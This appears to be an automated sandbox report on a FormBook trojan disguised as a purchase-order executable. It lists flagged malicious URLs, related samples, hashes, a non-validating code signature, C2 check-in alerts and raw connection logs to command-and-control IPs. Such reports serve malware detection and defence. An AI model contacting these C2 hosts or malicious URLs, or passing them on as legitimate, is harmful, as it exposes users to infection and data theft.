        http://www.adhdphotography.com/3gap/0%Avira URL Cloudsafe
        https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css0%VirustotalBrowse
        http://www.betopfloor.com/qy3g/0%Avira URL Cloudsafe
        http://www.allgiftedmalaysia.com/dkdj/0%VirustotalBrowse
        http://code.jquery.com/jquery-3.3.1.min.js0%Avira URL Cloudsafe
        http://www.ceo-retreats.co.uk/5s1a/?jTZPp=0jq67MNPRq4g2+jjEmEFgdmxU9xn3lZuU82S2yL3jkWaNmBkMCuTzs1oACp+jQZQfFcSAdfVUnty14PGpb+cvJdHxRsAacQFCcCRXvTpLBxg40F9NDu9hRQlsdpJQY/jGZexiU8=&5L0=2bCPy0100%Avira URL Cloudmalware
        http://www.adhdphotography.com/3gap/0%VirustotalBrowse
        http://code.jquery.com/jquery-3.3.1.min.js1%VirustotalBrowse
        http://www.shortput.top/05xu/1%VirustotalBrowse
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1448264
Start date and time: 2024-05-28 07:14:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Purchase Order_20240528.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@15/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 90
• Number of non-executed functions: 313
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Report creation exceeded maximum time and may have missing disassembly code information.
Time | Type | Description
01:14:50 | API Interceptor | 1x Sleep call for process: Purchase Order_20240528.exe modified
01:15:43 | API Interceptor | 12646281x Sleep call for process: nslookup.exe modified
                                www.ceo-retreats.co.ukUSD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 46.30.215.104
                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                Purchase Order_20240516.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AMAZON-02USSecuriteInfo.com.ELF.Remotehack-A.30964.4562.elfGet hashmaliciousUnknownBrowse
                                • 54.171.230.55
                                UR9IPwN06O.elfGet hashmaliciousMiraiBrowse
                                • 34.249.145.219
                                i0GHEh10ne.elfGet hashmaliciousMirai, OkiruBrowse
                                • 34.254.182.186
                                eId5V85KKM.elfGet hashmaliciousUnknownBrowse
                                • 54.101.89.128
                                0xh0roxxnavebusyoo.arm7.elfGet hashmaliciousMiraiBrowse
                                • 18.163.57.17
                                https://sudanesesport.com/Get hashmaliciousUnknownBrowse
                                • 65.9.86.127
                                http://82.165.254.110/loginmso.phpGet hashmaliciousHTMLPhisherBrowse
                                • 176.34.167.98
                                https://tiny-crumble-2e94fb.netlify.app/instruct.html/Get hashmaliciousUnknownBrowse
                                • 18.192.94.96
                                https://aquamarine-tartufo-riqueza.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
                                • 3.72.140.173
                                https://bespoke-croquembouche-6486c6.netlify.app/about.html/Get hashmaliciousUnknownBrowse
                                • 3.70.101.28
                                GD-EMEA-DC-SXB1DEPlatosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 92.205.8.26
                                http://ageofimmortalsgame.com/wth1uGet hashmaliciousPhisherBrowse
                                • 92.205.17.86
                                https://laurabingham.org/wp-content/plugins/wp-recipe-maker/downexcel.phpGet hashmaliciousUnknownBrowse
                                • 92.205.17.86
                                file.exeGet hashmaliciousUnknownBrowse
                                • 134.119.25.81
                                EST- 250424-0370pdf.exeGet hashmaliciousFormBookBrowse
                                • 92.205.170.193
                                Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 92.205.8.26
                                Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 92.205.15.157
                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • 92.205.15.157
                                file.exeGet hashmaliciousSystemBCBrowse
                                • 92.205.48.138
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • 92.205.15.157
                                ONECOMDKUSD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                2023-1392 Martin y Ruiz Recambio Surtekpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 46.30.215.97
                                justiicante transferencia compra vvda-pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 46.30.215.97
                                Offer Document 23.lnkGet hashmaliciousFormBookBrowse
                                • 46.30.213.191
                                qtCWL0lgfX.exeGet hashmaliciousFormBookBrowse
                                • 46.30.213.191
                                Offer Document 24.lnkGet hashmaliciousFormBookBrowse
                                • 46.30.213.191
                                COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                • 77.111.241.124
                                USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                Product Listsd#U0334r#U0334o#U0334w#U0334..exeGet hashmaliciousFormBookBrowse
                                • 104.37.39.71
                                Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 46.30.215.104
                                BODIS-NJUSUSD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                4TH HIRE SOA REMITTANCE_USD280,000.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                Shipping Document.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 199.59.243.225
                                COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                • 199.59.243.225
                                USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                w5c8CHID77.exeGet hashmaliciousUnknownBrowse
                                • 199.59.243.225
                                No context
                                No context
                                Process:C:\Users\user\Desktop\Purchase Order_20240528.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                Process:C:\Windows\SysWOW64\nslookup.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.1239949490932863
                                Encrypted:false
                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                MD5:271D5F995996735B01672CF227C81C17
                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.964294378330883
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Purchase Order_20240528.exe
                                File size:729'608 bytes
                                MD5:b6422c6c56cdab2a43415fdcceeaf3e6
                                SHA1:e05e478ce595c575d20f26b9cecc027068af5cd4
                                SHA256:91c657cef25403ba946ecfe02fa69010169e8ab2515d3a1608b405ac3d12c1cd
                                SHA512:b54797ea0c33eff6328a1548e4804e3a04e392d89a17ae6f507a778a6b7aa5a0d027707afe8805ac24f2f556aafd33e43dddb4b455b4bd9a43dd022f5020f629
                                SSDEEP:12288:1KcJV/xL+hxh/ZmLtf1NamPJ79GaBMu02wuRgxpAg7jcXWFEaM3By1GkR:oYtN5nGGMNSGAg7tXn
                                TLSH:5CF4129A76347793C2B58AF051F6C1224BF0274B2BB0D7D92DD524DB0AE2F984386D1B
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ECUf..............0......&........... ........@.. .......................`............@................................
                                Icon Hash:4c9e97336b69cda2
                                Entrypoint:0x4ae39e
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66554345 [Tue May 28 02:36:53 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Signature Valid:false
                                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                Signature Validation Error:The digital signature of the object did not verify
                                Error Number:-2146869232
                                Not Before, Not After
                                • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                Subject Chain
                                • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                Version:3
                                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                Serial:7C1118CBBADC95DA3752C46E47A27438
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xae34c | 0x4f | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x2270 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0xaec00 | 0x3608 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb4000 | 0xc | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0xac3a4 | 0xac400 | eaeac73bab83f2528b1d8407275c8595 | False | 0.9576137858309144 | data | 7.971095603069869 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc | 0xb0000 | 0x2270 | 0x2400 | d099f3ff62101f648197db42154c5924 | False | 0.8408203125 | data | 7.411115113608818 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0xb4000 | 0xc | 0x200 | b79bf82fd012f745c57f9bde664ed686 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                RT_ICON | 0xb0100 | 0x1c70 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9625
                                RT_GROUP_ICON | 0xb1d80 | 0x14 | data | | | 1.05
                                RT_VERSION | 0xb1da4 | 0x2cc | data | | | 0.4273743016759777
                                RT_MANIFEST | 0xb2080 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                DLL | Import
                                mscoree.dll | _CorExeMain
                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                05/28/24-07:16:53.334171 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49733 | 80 | 192.168.2.6 | 76.223.67.189
                                05/28/24-07:18:01.720040 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49753 | 80 | 192.168.2.6 | 108.179.192.228
                                05/28/24-07:15:38.516275 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49713 | 80 | 192.168.2.6 | 3.33.130.190
                                05/28/24-07:18:15.208740 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49757 | 80 | 192.168.2.6 | 149.88.84.60
                                05/28/24-07:17:09.283748 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49738 | 80 | 192.168.2.6 | 216.40.34.41
                                05/28/24-07:16:42.377017 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49730 | 80 | 192.168.2.6 | 92.205.15.157
                                05/28/24-07:16:15.498664 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49722 | 80 | 192.168.2.6 | 199.59.243.225
                                05/28/24-07:17:20.398275 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49741 | 80 | 192.168.2.6 | 203.161.43.227
                                05/28/24-07:18:17.738015 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49758 | 80 | 192.168.2.6 | 149.88.84.60
                                05/28/24-07:15:52.921989 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49718 | 80 | 192.168.2.6 | 212.227.172.254
                                05/28/24-07:16:12.940995 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49721 | 80 | 192.168.2.6 | 199.59.243.225
                                05/28/24-07:16:55.860764 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49734 | 80 | 192.168.2.6 | 76.223.67.189
                                05/28/24-07:17:47.272667 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49749 | 80 | 192.168.2.6 | 178.63.50.103
                                05/28/24-07:17:33.834488 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49745 | 80 | 192.168.2.6 | 185.229.21.229
                                05/28/24-07:16:26.572363 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49725 | 80 | 192.168.2.6 | 46.30.215.104
                                05/28/24-07:17:06.750149 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.6 | 216.40.34.41
                                05/28/24-07:17:49.818347 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49750 | 80 | 192.168.2.6 | 178.63.50.103
                                05/28/24-07:18:49.380784 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49761 | 80 | 192.168.2.6 | 3.33.130.190
                                05/28/24-07:16:29.112208 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49726 | 80 | 192.168.2.6 | 46.30.215.104
                                05/28/24-07:16:39.845789 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49729 | 80 | 192.168.2.6 | 92.205.15.157
                                05/28/24-07:18:04.253452 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49754 | 80 | 192.168.2.6 | 108.179.192.228
                                05/28/24-07:18:51.922417 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49762 | 80 | 192.168.2.6 | 3.33.130.190
                                05/28/24-07:17:22.933853 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49742 | 80 | 192.168.2.6 | 203.161.43.227
                                05/28/24-07:17:36.363867 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49746 | 80 | 192.168.2.6 | 185.229.21.229
                                05/28/24-07:15:50.391688 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49717 | 80 | 192.168.2.6 | 212.227.172.254
                                05/28/24-07:15:35.984016 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49712 | 80 | 192.168.2.6 | 3.33.130.190
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                May 28, 2024 07:15:51.055404902 CEST4971780192.168.2.6212.227.172.254
                                May 28, 2024 07:15:51.897417068 CEST4971780192.168.2.6212.227.172.254
                                May 28, 2024 07:15:52.915399075 CEST4971880192.168.2.6212.227.172.254
                                May 28, 2024 07:15:52.920397997 CEST8049718212.227.172.254192.168.2.6
                                May 28, 2024 07:15:52.920490026 CEST4971880192.168.2.6212.227.172.254
                                May 28, 2024 07:15:52.921988964 CEST4971880192.168.2.6212.227.172.254
                                May 28, 2024 07:15:52.926809072 CEST8049718212.227.172.254192.168.2.6
                                May 28, 2024 07:15:53.575499058 CEST8049718212.227.172.254192.168.2.6
                                May 28, 2024 07:15:53.575553894 CEST8049718212.227.172.254192.168.2.6
                                May 28, 2024 07:15:53.575722933 CEST4971880192.168.2.6212.227.172.254
                                May 28, 2024 07:15:54.452100992 CEST4971880192.168.2.6212.227.172.254
                                May 28, 2024 07:15:55.462286949 CEST4971980192.168.2.6212.227.172.254
                                May 28, 2024 07:15:55.467339993 CEST8049719212.227.172.254192.168.2.6
                                May 28, 2024 07:15:55.467659950 CEST4971980192.168.2.6212.227.172.254
                                May 28, 2024 07:15:55.469028950 CEST4971980192.168.2.6212.227.172.254
                                May 28, 2024 07:15:55.474009037 CEST8049719212.227.172.254192.168.2.6
                                May 28, 2024 07:15:55.474081993 CEST8049719212.227.172.254192.168.2.6
                                May 28, 2024 07:15:56.103212118 CEST8049719212.227.172.254192.168.2.6
                                May 28, 2024 07:15:56.103262901 CEST8049719212.227.172.254192.168.2.6
                                May 28, 2024 07:15:56.103380919 CEST4971980192.168.2.6212.227.172.254
                                May 28, 2024 07:15:56.975610018 CEST4971980192.168.2.6212.227.172.254
                                May 28, 2024 07:15:58.296833992 CEST4972080192.168.2.6212.227.172.254
                                May 28, 2024 07:15:58.301953077 CEST8049720212.227.172.254192.168.2.6
                                May 28, 2024 07:15:58.302047968 CEST4972080192.168.2.6212.227.172.254
                                May 28, 2024 07:15:58.304367065 CEST4972080192.168.2.6212.227.172.254
                                May 28, 2024 07:15:58.309278965 CEST8049720212.227.172.254192.168.2.6
                                May 28, 2024 07:15:58.947814941 CEST8049720212.227.172.254192.168.2.6
                                May 28, 2024 07:15:58.948544979 CEST8049720212.227.172.254192.168.2.6
                                May 28, 2024 07:15:58.948702097 CEST4972080192.168.2.6212.227.172.254
                                May 28, 2024 07:15:59.724533081 CEST4972080192.168.2.6212.227.172.254
                                May 28, 2024 07:15:59.729696989 CEST8049720212.227.172.254192.168.2.6
                                May 28, 2024 07:16:12.934411049 CEST4972180192.168.2.6199.59.243.225
                                May 28, 2024 07:16:12.939450026 CEST8049721199.59.243.225192.168.2.6
                                May 28, 2024 07:16:12.939533949 CEST4972180192.168.2.6199.59.243.225
                                May 28, 2024 07:16:12.940994978 CEST4972180192.168.2.6199.59.243.225
                                May 28, 2024 07:16:12.945880890 CEST8049721199.59.243.225192.168.2.6
                                May 28, 2024 07:16:13.409863949 CEST8049721199.59.243.225192.168.2.6
                                May 28, 2024 07:16:13.409884930 CEST8049721199.59.243.225192.168.2.6
                                May 28, 2024 07:16:13.409895897 CEST8049721199.59.243.225192.168.2.6
                                May 28, 2024 07:16:13.409987926 CEST4972180192.168.2.6199.59.243.225
                                May 28, 2024 07:16:14.444320917 CEST4972180192.168.2.6199.59.243.225
                                May 28, 2024 07:16:15.488621950 CEST4972280192.168.2.6199.59.243.225
                                May 28, 2024 07:16:15.494844913 CEST8049722199.59.243.225192.168.2.6
                                May 28, 2024 07:16:15.494940996 CEST4972280192.168.2.6199.59.243.225
                                May 28, 2024 07:16:15.498663902 CEST4972280192.168.2.6199.59.243.225
                                May 28, 2024 07:16:15.505259991 CEST8049722199.59.243.225192.168.2.6
                                May 28, 2024 07:16:15.989741087 CEST8049722199.59.243.225192.168.2.6
                                May 28, 2024 07:16:15.989758015 CEST8049722199.59.243.225192.168.2.6
                                May 28, 2024 07:16:15.989821911 CEST8049722199.59.243.225192.168.2.6
                                May 28, 2024 07:16:15.989852905 CEST4972280192.168.2.6199.59.243.225
                                May 28, 2024 07:16:15.989938021 CEST4972280192.168.2.6199.59.243.225
                                May 28, 2024 07:16:17.447487116 CEST4972280192.168.2.6199.59.243.225
                                May 28, 2024 07:16:18.463793039 CEST4972380192.168.2.6199.59.243.225
                                May 28, 2024 07:16:18.470163107 CEST8049723199.59.243.225192.168.2.6
                                May 28, 2024 07:16:18.470267057 CEST4972380192.168.2.6199.59.243.225
                                May 28, 2024 07:16:18.471956968 CEST4972380192.168.2.6199.59.243.225
                                May 28, 2024 07:16:18.476828098 CEST8049723199.59.243.225192.168.2.6
                                May 28, 2024 07:16:18.476948023 CEST8049723199.59.243.225192.168.2.6
                                May 28, 2024 07:16:18.937002897 CEST8049723199.59.243.225192.168.2.6
                                May 28, 2024 07:16:18.937027931 CEST8049723199.59.243.225192.168.2.6
                                May 28, 2024 07:16:18.937043905 CEST8049723199.59.243.225192.168.2.6
                                May 28, 2024 07:16:18.937113047 CEST4972380192.168.2.6199.59.243.225
                                May 28, 2024 07:16:19.981065035 CEST4972380192.168.2.6199.59.243.225
                                May 28, 2024 07:16:20.990098953 CEST4972480192.168.2.6199.59.243.225
                                May 28, 2024 07:16:20.995052099 CEST8049724199.59.243.225192.168.2.6
                                May 28, 2024 07:16:20.995165110 CEST4972480192.168.2.6199.59.243.225
                                May 28, 2024 07:16:20.997710943 CEST4972480192.168.2.6199.59.243.225
                                May 28, 2024 07:16:21.002676010 CEST8049724199.59.243.225192.168.2.6
                                May 28, 2024 07:16:21.480499983 CEST8049724199.59.243.225192.168.2.6
                                May 28, 2024 07:16:21.480524063 CEST8049724199.59.243.225192.168.2.6
                                May 28, 2024 07:16:21.480540991 CEST8049724199.59.243.225192.168.2.6
                                May 28, 2024 07:16:21.480724096 CEST4972480192.168.2.6199.59.243.225
                                May 28, 2024 07:16:21.482969046 CEST4972480192.168.2.6199.59.243.225
                                May 28, 2024 07:16:21.487874031 CEST8049724199.59.243.225192.168.2.6
                                May 28, 2024 07:16:26.565370083 CEST4972580192.168.2.646.30.215.104
                                May 28, 2024 07:16:26.570349932 CEST804972546.30.215.104192.168.2.6
                                May 28, 2024 07:16:26.570524931 CEST4972580192.168.2.646.30.215.104
                                May 28, 2024 07:16:26.572362900 CEST4972580192.168.2.646.30.215.104
                                May 28, 2024 07:16:26.577322006 CEST804972546.30.215.104192.168.2.6
                                May 28, 2024 07:16:27.226155996 CEST804972546.30.215.104192.168.2.6
                                May 28, 2024 07:16:27.226552963 CEST804972546.30.215.104192.168.2.6
                                May 28, 2024 07:16:27.228722095 CEST4972580192.168.2.646.30.215.104
                                May 28, 2024 07:16:28.085365057 CEST4972580192.168.2.646.30.215.104
                                May 28, 2024 07:16:29.103724957 CEST4972680192.168.2.646.30.215.104
                                May 28, 2024 07:16:29.108813047 CEST804972646.30.215.104192.168.2.6
                                May 28, 2024 07:16:29.108973026 CEST4972680192.168.2.646.30.215.104
                                May 28, 2024 07:16:29.112207890 CEST4972680192.168.2.646.30.215.104
                                May 28, 2024 07:16:29.117263079 CEST804972646.30.215.104192.168.2.6
                                May 28, 2024 07:16:29.760127068 CEST804972646.30.215.104192.168.2.6
                                May 28, 2024 07:16:29.760210037 CEST804972646.30.215.104192.168.2.6
                                May 28, 2024 07:16:29.760257006 CEST4972680192.168.2.646.30.215.104
                                May 28, 2024 07:16:30.616164923 CEST4972680192.168.2.646.30.215.104
                                May 28, 2024 07:16:31.636399031 CEST4972780192.168.2.646.30.215.104
                                May 28, 2024 07:16:31.641371012 CEST804972746.30.215.104192.168.2.6
                                May 28, 2024 07:16:31.644501925 CEST4972780192.168.2.646.30.215.104
                                May 28, 2024 07:16:31.647429943 CEST4972780192.168.2.646.30.215.104
                                May 28, 2024 07:16:31.652410984 CEST804972746.30.215.104192.168.2.6
                                May 28, 2024 07:16:31.652481079 CEST804972746.30.215.104192.168.2.6
                                May 28, 2024 07:16:32.310722113 CEST804972746.30.215.104192.168.2.6
                                May 28, 2024 07:16:32.310739040 CEST804972746.30.215.104192.168.2.6
                                May 28, 2024 07:16:32.310745955 CEST804972746.30.215.104192.168.2.6
                                May 28, 2024 07:16:32.310797930 CEST4972780192.168.2.646.30.215.104
                                May 28, 2024 07:16:33.147563934 CEST4972780192.168.2.646.30.215.104
                                May 28, 2024 07:16:34.166640997 CEST4972880192.168.2.646.30.215.104
                                May 28, 2024 07:16:34.171670914 CEST804972846.30.215.104192.168.2.6
                                May 28, 2024 07:16:34.171744108 CEST4972880192.168.2.646.30.215.104
                                May 28, 2024 07:16:34.173558950 CEST4972880192.168.2.646.30.215.104
                                May 28, 2024 07:16:34.178436041 CEST804972846.30.215.104192.168.2.6
                                May 28, 2024 07:16:34.811148882 CEST804972846.30.215.104192.168.2.6
                                May 28, 2024 07:16:34.812824011 CEST804972846.30.215.104192.168.2.6
                                May 28, 2024 07:16:34.814327955 CEST4972880192.168.2.646.30.215.104
                                May 28, 2024 07:16:34.818176031 CEST4972880192.168.2.646.30.215.104
                                May 28, 2024 07:16:34.823033094 CEST804972846.30.215.104192.168.2.6
                                May 28, 2024 07:16:39.838543892 CEST4972980192.168.2.692.205.15.157
                                May 28, 2024 07:16:39.843426943 CEST804972992.205.15.157192.168.2.6
